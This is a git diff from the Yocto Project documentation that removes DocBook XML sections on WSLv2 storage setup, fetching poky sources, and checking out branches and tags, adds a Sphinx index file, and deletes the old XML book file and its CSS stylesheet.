- *Ubuntu Running 2
- </literallayout>
- Note the version column which says the WSL version being used by
- your distribution, on compatible systems, this can be changed back
- at any point in time.
- </para></listitem>
- <listitem><para>
- <emphasis>Optionally Orient Yourself on WSL:</emphasis>
- If you are unfamiliar with WSL, you can learn more here -
- <ulink url='https://docs.microsoft.com/en-us/windows/wsl/wsl2-about'></ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis>Launch your WSL Distibution:</emphasis>
- From the Windows start menu simply launch your WSL distribution
- just like any other application.
- </para></listitem>
- <listitem><para>
- <emphasis>Optimize your WSLv2 storage often:</emphasis>
- Due to the way storage is handled on WSLv2, the storage
- space used by the undelying Linux distribution is not
- reflected immedately, and since bitbake heavily uses
- storage, after several builds, you may be unaware you
- are running out of space. WSLv2 uses a VHDX file for
- storage, this issue can be easily avoided by manually
- optimizing this file often, this can be done in the
- following way:
- <orderedlist>
- <listitem><para>
- <emphasis>Find the location of your VHDX file:</emphasis>
- First you need to find the distro app package directory,
- to achieve this open a Windows Powershell as Administrator
- and run:
- <literallayout class='monospaced'>
- C:\WINDOWS\system32> Get-AppxPackage -Name "*Ubuntu*" | Select PackageFamilyName
- PackageFamilyName
- -----------------
- CanonicalGroupLimited.UbuntuonWindows_79abcdefgh
- </literallayout>
- You should now replace the <replaceable>PackageFamilyName</replaceable>
- and your <replaceable>user</replaceable> on the following
- path to find your VHDX file: <filename>C:\Users\user\AppData\Local\Packages\PackageFamilyName\LocalState\</filename>
- For example:
- <literallayout class='monospaced'>
- ls C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\
- Mode LastWriteTime Length Name
- -a---- 3/14/2020 9:52 PM 57418973184 ext4.vhdx
- </literallayout>
- Your VHDX file path is: <filename>C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\ext4.vhdx</filename>
- </para></listitem>
- <listitem><para><emphasis>Optimize your VHDX file:</emphasis>
- Open a Windows Powershell as Administrator to optimize
- your VHDX file, shutting down WSL first:
- <literallayout class='monospaced'>
- C:\WINDOWS\system32> wsl --shutdown
- C:\WINDOWS\system32> optimize-vhd -Path C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\ext4.vhdx -Mode full
- </literallayout>
- A progress bar should be shown while optimizing the VHDX file,
- and storage should now be reflected correctly on the Windows
- Explorer.
- </para></listitem>
- </orderedlist>
- </para></listitem>
- </orderedlist>
- <note>
- The current implementation of WSLv2 does not have out-of-the-box
- access to external devices such as those connected through a
- USB port, but it automatically mounts your <filename>C:</filename>
- drive on <filename>/mnt/c/</filename> (and others), which
- you can use to share deploy artifacts to be later flashed on
- hardware through Windows, but your build directory should not
- reside inside this mountpoint.
- </note>
- Once you have WSLv2 set up, everything is in place to
- develop just as if you were running on a native Linux machine.
- If you are going to use the Extensible SDK container, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extensible'>Using the Extensible SDK</ulink>"
- Chapter in the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) manual.
- If you are going to use the Toaster container, see the
- "<ulink url='&YOCTO_DOCS_TOAST_URL;#toaster-manual-setup-and-use'>Setting Up and Using Toaster</ulink>"
- section in the Toaster User Manual.
- </para>
- </section>
-</section>
-
-<section id='locating-yocto-project-source-files'>
- <title>Locating Yocto Project Source Files</title>
-
- <para>
- This section shows you how to locate, fetch and configure the source
- files you'll need to work with the Yocto Project.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- For concepts and introductory information about Git as it
- is used in the Yocto Project, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para></listitem>
- <listitem><para>
- For concepts on Yocto Project source repositories, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#yocto-project-repositories'>Yocto Project Source Repositories</ulink>"
- section in the Yocto Project Overview and Concepts Manual."
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <section id='accessing-source-repositories'>
- <title>Accessing Source Repositories</title>
-
- <para>
- Working from a copy of the upstream Yocto Project
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
- is the preferred method for obtaining and using a Yocto Project
- release.
- You can view the Yocto Project Source Repositories at
- <ulink url='&YOCTO_GIT_URL;'></ulink>.
- In particular, you can find the
- <filename>poky</filename> repository at
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/'></ulink>.
- </para>
-
- <para>
- Use the following procedure to locate the latest upstream copy of
- the <filename>poky</filename> Git repository:
- <orderedlist>
- <listitem><para>
- <emphasis>Access Repositories:</emphasis>
- Open a browser and go to
- <ulink url='&YOCTO_GIT_URL;'></ulink> to access the
- GUI-based interface into the Yocto Project source
- repositories.
- </para></listitem>
- <listitem><para>
- <emphasis>Select the Repository:</emphasis>
- Click on the repository in which you are interested (e.g.
- <filename>poky</filename>).
- </para></listitem>
- <listitem><para>
- <emphasis>Find the URL Used to Clone the Repository:</emphasis>
- At the bottom of the page, note the URL used to
- <ulink url='&YOCTO_DOCS_OM_URL;#git-commands-clone'>clone</ulink>
- that repository (e.g.
- <filename>&YOCTO_GIT_URL;/poky</filename>).
- <note>
- For information on cloning a repository, see the
- "<link linkend='cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</link>"
- section.
- </note>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='accessing-index-of-releases'>
- <title>Accessing Index of Releases</title>
-
- <para>
- Yocto Project maintains an Index of Releases area that contains
- related files that contribute to the Yocto Project.
- Rather than Git repositories, these files are tarballs that
- represent snapshots in time of a given component.
- <note><title>Tip</title>
- The recommended method for accessing Yocto Project
- components is to use Git to clone the upstream repository and
- work from within that locally cloned repository.
- The procedure in this section exists should you desire a
- tarball snapshot of any given component.
- </note>
- Follow these steps to locate and download a particular tarball:
- <orderedlist>
- <listitem><para>
- <emphasis>Access the Index of Releases:</emphasis>
- Open a browser and go to
- <ulink url='&YOCTO_DL_URL;/releases'></ulink> to access the
- Index of Releases.
- The list represents released components (e.g.
- <filename>bitbake</filename>,
- <filename>sato</filename>, and so on).
- <note>
- The <filename>yocto</filename> directory contains the
- full array of released Poky tarballs.
- The <filename>poky</filename> directory in the
- Index of Releases was historically used for very
- early releases and exists now only for retroactive
- completeness.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Select a Component:</emphasis>
- Click on any released component in which you are interested
- (e.g. <filename>yocto</filename>).
- </para></listitem>
- <listitem><para>
- <emphasis>Find the Tarball:</emphasis>
- Drill down to find the associated tarball.
- For example, click on <filename>yocto-&DISTRO;</filename> to
- view files associated with the Yocto Project &DISTRO;
- release (e.g. <filename>poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;.tar.bz2</filename>,
- which is the released Poky tarball).
- </para></listitem>
- <listitem><para>
- <emphasis>Download the Tarball:</emphasis>
- Click the tarball to download and save a snapshot of the
- given component.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='using-the-downloads-page'>
- <title>Using the Downloads Page</title>
-
- <para>
- The
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>
- uses a "DOWNLOADS" page from which you can locate and download
- tarballs of any Yocto Project release.
- Rather than Git repositories, these files represent snapshot
- tarballs similar to the tarballs located in the Index of Releases
- described in the
- "<link linkend='accessing-index-of-releases'>Accessing Index of Releases</link>"
- section.
- <note><title>Tip</title>
- The recommended method for accessing Yocto Project
- components is to use Git to clone a repository and work from
- within that local repository.
- The procedure in this section exists should you desire a
- tarball snapshot of any given component.
- </note>
- <orderedlist>
- <listitem><para>
- <emphasis>Go to the Yocto Project Website:</emphasis>
- Open The
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>
- in your browser.
- </para></listitem>
- <listitem><para>
- <emphasis>Get to the Downloads Area:</emphasis>
- Select the "DOWNLOADS" item from the pull-down
- "SOFTWARE" tab menu near the top of the page.
- </para></listitem>
- <listitem><para>
- <emphasis>Select a Yocto Project Release:</emphasis>
- Use the menu next to "RELEASE" to display and choose
- a recent or past supported Yocto Project release
- (e.g. &DISTRO_NAME_NO_CAP;,
- &DISTRO_NAME_NO_CAP_MINUS_ONE;, and so forth).
- <note><title>Tip</title>
- For a "map" of Yocto Project releases to version
- numbers, see the
- <ulink url='https://wiki.yoctoproject.org/wiki/Releases'>Releases</ulink>
- wiki page.
- </note>
- You can use the "RELEASE ARCHIVE" link to reveal a menu of
- all Yocto Project releases.
- </para></listitem>
- <listitem><para>
- <emphasis>Download Tools or Board Support Packages (BSPs):</emphasis>
- From the "DOWNLOADS" page, you can download tools or
- BSPs as well.
- Just scroll down the page and look for what you need.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='accessing-nightly-builds'>
- <title>Accessing Nightly Builds</title>
-
- <para>
- Yocto Project maintains an area for nightly builds that contains
- tarball releases at <ulink url='&YOCTO_AB_NIGHTLY_URL;'/>.
- These builds include Yocto Project releases ("poky"),
- toolchains, and builds for supported machines.
- </para>
-
- <para>
- Should you ever want to access a nightly build of a particular
- Yocto Project component, use the following procedure:
- <orderedlist>
- <listitem><para>
- <emphasis>Locate the Index of Nightly Builds:</emphasis>
- Open a browser and go to
- <ulink url='&YOCTO_AB_NIGHTLY_URL;'/> to access the
- Nightly Builds.
- </para></listitem>
- <listitem><para>
- <emphasis>Select a Date:</emphasis>
- Click on the date in which you are interested.
- If you want the latest builds, use "CURRENT".
- </para></listitem>
- <listitem><para>
- <emphasis>Select a Build:</emphasis>
- Choose the area in which you are interested.
- For example, if you are looking for the most recent
- toolchains, select the "toolchain" link.
- </para></listitem>
- <listitem><para>
- <emphasis>Find the Tarball:</emphasis>
- Drill down to find the associated tarball.
- </para></listitem>
- <listitem><para>
- <emphasis>Download the Tarball:</emphasis>
- Click the tarball to download and save a snapshot of the
- given component.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-</section>
-
-<section id='cloning-and-checking-out-branches'>
- <title>Cloning and Checking Out Branches</title>
-
- <para>
- To use the Yocto Project for development, you need a release locally
- installed on your development system.
- This locally installed set of files is referred to as the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- in the Yocto Project documentation.
- </para>
-
- <para>
- The preferred method of creating your Source Directory is by using
- <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink> to clone a local
- copy of the upstream <filename>poky</filename> repository.
- Working from a cloned copy of the upstream repository allows you
- to contribute back into the Yocto Project or to simply work with
- the latest software on a development branch.
- Because Git maintains and creates an upstream repository with
- a complete history of changes and you are working with a local
- clone of that repository, you have access to all the Yocto
- Project development branches and tag names used in the upstream
- repository.
- </para>
-
- <section id='cloning-the-poky-repository'>
- <title>Cloning the <filename>poky</filename> Repository</title>
-
- <para>
- Follow these steps to create a local version of the
- upstream
- <ulink url='&YOCTO_DOCS_REF_URL;#poky'><filename>poky</filename></ulink>
- Git repository.
- <orderedlist>
- <listitem><para>
- <emphasis>Set Your Directory:</emphasis>
- Change your working directory to where you want to
- create your local copy of
- <filename>poky</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis>Clone the Repository:</emphasis>
- The following example command clones the
- <filename>poky</filename> repository and uses
- the default name "poky" for your local repository:
- <literallayout class='monospaced'>
- $ git clone git://git.yoctoproject.org/poky
- Cloning into 'poky'...
- remote: Counting objects: 432160, done.
- remote: Compressing objects: 100% (102056/102056), done.
- remote: Total 432160 (delta 323116), reused 432037 (delta 323000)
- Receiving objects: 100% (432160/432160), 153.81 MiB | 8.54 MiB/s, done.
- Resolving deltas: 100% (323116/323116), done.
- Checking connectivity... done.
- </literallayout>
- Unless you specify a specific development branch or
- tag name, Git clones the "master" branch, which results
- in a snapshot of the latest development changes for
- "master".
- For information on how to check out a specific
- development branch or on how to check out a local
- branch based on a tag name, see the
- "<link linkend='checking-out-by-branch-in-poky'>Checking Out By Branch in Poky</link>"
- and
- <link linkend='checkout-out-by-tag-in-poky'>Checking Out By Tag in Poky</link>"
- sections, respectively.</para>
-
- <para>Once the local repository is created, you can
- change to that directory and check its status.
- Here, the single "master" branch exists on your system
- and by default, it is checked out:
- <literallayout class='monospaced'>
- $ cd ~/poky
- $ git status
- On branch master
- Your branch is up-to-date with 'origin/master'.
- nothing to commit, working directory clean
- $ git branch
- * master
- </literallayout>
- Your local repository of poky is identical to the
- upstream poky repository at the time from which it was
- cloned.
- As you work with the local branch, you can periodically
- use the <filename>git pull &dash;&dash;rebase</filename>
- command to be sure you are up-to-date with the upstream
- branch.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='checking-out-by-branch-in-poky'>
- <title>Checking Out by Branch in Poky</title>
-
- <para>
- When you clone the upstream poky repository, you have access to
- all its development branches.
- Each development branch in a repository is unique as it forks
- off the "master" branch.
- To see and use the files of a particular development branch
- locally, you need to know the branch name and then specifically
- check out that development branch.
- <note>
- Checking out an active development branch by branch name
- gives you a snapshot of that particular branch at the time
- you check it out.
- Further development on top of the branch that occurs after
- check it out can occur.
- </note>
- <orderedlist>
- <listitem><para>
- <emphasis>Switch to the Poky Directory:</emphasis>
- If you have a local poky Git repository, switch to that
- directory.
- If you do not have the local copy of poky, see the
- "<link linkend='cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</link>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis>Determine Existing Branch Names:</emphasis>
- <literallayout class='monospaced'>
- $ git branch -a
- * master
- remotes/origin/1.1_M1
- remotes/origin/1.1_M2
- remotes/origin/1.1_M3
- remotes/origin/1.1_M4
- remotes/origin/1.2_M1
- remotes/origin/1.2_M2
- remotes/origin/1.2_M3
- .
- .
- .
- remotes/origin/thud
- remotes/origin/thud-next
- remotes/origin/warrior
- remotes/origin/warrior-next
- remotes/origin/zeus
- remotes/origin/zeus-next
- ... and so on ...
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Check out the Branch:</emphasis>
- Check out the development branch in which you want to work.
- For example, to access the files for the Yocto Project
- &DISTRO; Release (&DISTRO_NAME;), use the following command:
- <literallayout class='monospaced'>
- $ git checkout -b &DISTRO_NAME_NO_CAP; origin/&DISTRO_NAME_NO_CAP;
- Branch &DISTRO_NAME_NO_CAP; set up to track remote branch &DISTRO_NAME_NO_CAP; from origin.
- Switched to a new branch '&DISTRO_NAME_NO_CAP;'
- </literallayout>
- The previous command checks out the "&DISTRO_NAME_NO_CAP;"
- development branch and reports that the branch is tracking
- the upstream "origin/&DISTRO_NAME_NO_CAP;" branch.</para>
-
- <para>The following command displays the branches
- that are now part of your local poky repository.
- The asterisk character indicates the branch that is
- currently checked out for work:
- <literallayout class='monospaced'>
- $ git branch
- master
- * &DISTRO_NAME_NO_CAP;
- </literallayout>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='checkout-out-by-tag-in-poky'>
- <title>Checking Out by Tag in Poky</title>
-
- <para>
- Similar to branches, the upstream repository uses tags
- to mark specific commits associated with significant points in
- a development branch (i.e. a release point or stage of a
- release).
- You might want to set up a local branch based on one of those
- points in the repository.
- The process is similar to checking out by branch name except you
- use tag names.
- <note>
- Checking out a branch based on a tag gives you a
- stable set of files not affected by development on the
- branch above the tag.
- </note>
- <orderedlist>
- <listitem><para>
- <emphasis>Switch to the Poky Directory:</emphasis>
- If you have a local poky Git repository, switch to that
- directory.
- If you do not have the local copy of poky, see the
- "<link linkend='cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</link>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis>Fetch the Tag Names:</emphasis>
- To checkout the branch based on a tag name, you need to
- fetch the upstream tags into your local repository:
- <literallayout class='monospaced'>
- $ git fetch --tags
- $
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>List the Tag Names:</emphasis>
- You can list the tag names now:
- <literallayout class='monospaced'>
- $ git tag
- 1.1_M1.final
- 1.1_M1.rc1
- 1.1_M1.rc2
- 1.1_M2.final
- 1.1_M2.rc1
- .
- .
- .
- yocto-2.5
- yocto-2.5.1
- yocto-2.5.2
- yocto-2.5.3
- yocto-2.6
- yocto-2.6.1
- yocto-2.6.2
- yocto-2.7
- yocto_1.5_M5.rc8
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Check out the Branch:</emphasis>
- <literallayout class='monospaced'>
- $ git checkout tags/&DISTRO_REL_TAG; -b my_yocto_&DISTRO;
- Switched to a new branch 'my_yocto_&DISTRO;'
- $ git branch
- master
- * my_yocto_&DISTRO;
- </literallayout>
- The previous command creates and checks out a local
- branch named "my_yocto_&DISTRO;", which is based on
- the commit in the upstream poky repository that has
- the same tag.
- In this example, the files you have available locally
- as a result of the <filename>checkout</filename>
- command are a snapshot of the
- "&DISTRO_NAME_NO_CAP;" development branch at the point
- where Yocto Project &DISTRO; was released.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/dev-manual/dev-manual.rst b/documentation/dev-manual/dev-manual.rst
new file mode 100644
index 0000000000..8f09224fe8
--- /dev/null
+++ b/documentation/dev-manual/dev-manual.rst
@@ -0,0 +1,19 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+======================================
+Yocto Project Development Tasks Manual
+======================================
+
+|
+
+.. toctree::
+ :caption: Table of Contents
+ :numbered:
+
+ dev-manual-intro
+ dev-manual-start
+ dev-manual-common-tasks
+ dev-manual-qemu
+ history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/dev-manual/dev-manual.xml b/documentation/dev-manual/dev-manual.xml
deleted file mode 100755
index 26d37da354..0000000000
--- a/documentation/dev-manual/dev-manual.xml
+++ /dev/null
@@ -1,214 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='dev-manual' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
- <bookinfo>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/dev-title.png'
- format='SVG'
- align='left' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- Yocto Project Development Tasks Manual
- </title>
-
- <authorgroup>
- <author>
- <affiliation>
- <orgname>&ORGNAME;</orgname>
- </affiliation>
- <email>&ORGEMAIL;</email>
- </author>
- </authorgroup>
-
- <revhistory>
- <revision>
- <revnumber>1.1</revnumber>
- <date>October 2011</date>
- <revremark>The initial document released with the Yocto Project 1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.2</revnumber>
- <date>April 2012</date>
- <revremark>Released with the Yocto Project 1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.3</revnumber>
- <date>October 2012</date>
- <revremark>Released with the Yocto Project 1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.4</revnumber>
- <date>April 2013</date>
- <revremark>Released with the Yocto Project 1.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.5</revnumber>
- <date>October 2013</date>
- <revremark>Released with the Yocto Project 1.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.6</revnumber>
- <date>April 2014</date>
- <revremark>Released with the Yocto Project 1.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.7</revnumber>
- <date>October 2014</date>
- <revremark>Released with the Yocto Project 1.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.8</revnumber>
- <date>April 2015</date>
- <revremark>Released with the Yocto Project 1.8 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.0</revnumber>
- <date>October 2015</date>
- <revremark>Released with the Yocto Project 2.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.1</revnumber>
- <date>April 2016</date>
- <revremark>Released with the Yocto Project 2.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.2</revnumber>
- <date>October 2016</date>
- <revremark>Released with the Yocto Project 2.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.3</revnumber>
- <date>May 2017</date>
- <revremark>Released with the Yocto Project 2.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.4</revnumber>
- <date>October 2017</date>
- <revremark>Released with the Yocto Project 2.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.5</revnumber>
- <date>May 2018</date>
- <revremark>Released with the Yocto Project 2.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.6</revnumber>
- <date>November 2018</date>
- <revremark>Released with the Yocto Project 2.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.7</revnumber>
- <date>May 2019</date>
- <revremark>Released with the Yocto Project 2.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.0</revnumber>
- <date>October 2019</date>
- <revremark>Released with the Yocto Project 3.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1</revnumber>
- <date>April 2020</date>
- <revremark>Released with the Yocto Project 3.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.1</revnumber>
- <date>June 2020</date>
- <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.2</revnumber>
- <date>August 2020</date>
- <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.3</revnumber>
- <date>October 2020</date>
- <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.4</revnumber>
- <date>&REL_MONTH_YEAR;</date>
- <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
- </revision>
- </revhistory>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">
- Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by
- Creative Commons.
- </para>
- <note><title>Manual Notes</title>
- <itemizedlist>
- <listitem><para>
- This version of the
- <emphasis>Yocto Project Development Tasks Manual</emphasis>
- is for the &YOCTO_DOC_VERSION; release of the
- Yocto Project.
- To be sure you have the latest version of the manual
- for this release, go to the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual from that site.
- Manuals from the site are more up-to-date than manuals
- derived from the Yocto Project released TAR files.
- </para></listitem>
- <listitem><para>
- If you located this manual through a web search, the
- version of the manual might not be the one you want
- (e.g. the search might have returned a manual much
- older than the Yocto Project version with which you
- are working).
- You can see all Yocto Project major releases by
- visiting the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
- page.
- If you need a version of this manual for a different
- Yocto Project release, visit the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual set by using the
- "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
- pull-down menus.
- </para></listitem>
- <listitem>
- <para>
- To report any inaccuracies or problems with this
- (or any other Yocto Project) manual, send an email to
- the Yocto Project documentation mailing list at
- <filename>docs@lists.yoctoproject.org</filename> or
- log into the freenode <filename>#yocto</filename> channel.
- </para>
- </listitem>
- </itemizedlist>
- </note>
- </legalnotice>
-
- </bookinfo>
-
- <xi:include href="dev-manual-intro.xml"/>
-
- <xi:include href="dev-manual-start.xml"/>
-
- <xi:include href="dev-manual-common-tasks.xml"/>
-
- <xi:include href="dev-manual-qemu.xml"/>
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/dev-manual/dev-style.css b/documentation/dev-manual/dev-style.css
deleted file mode 100644
index 6d0aa8e9fa..0000000000
--- a/documentation/dev-manual/dev-style.css
+++ /dev/null
@@ -1,988 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/dev-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
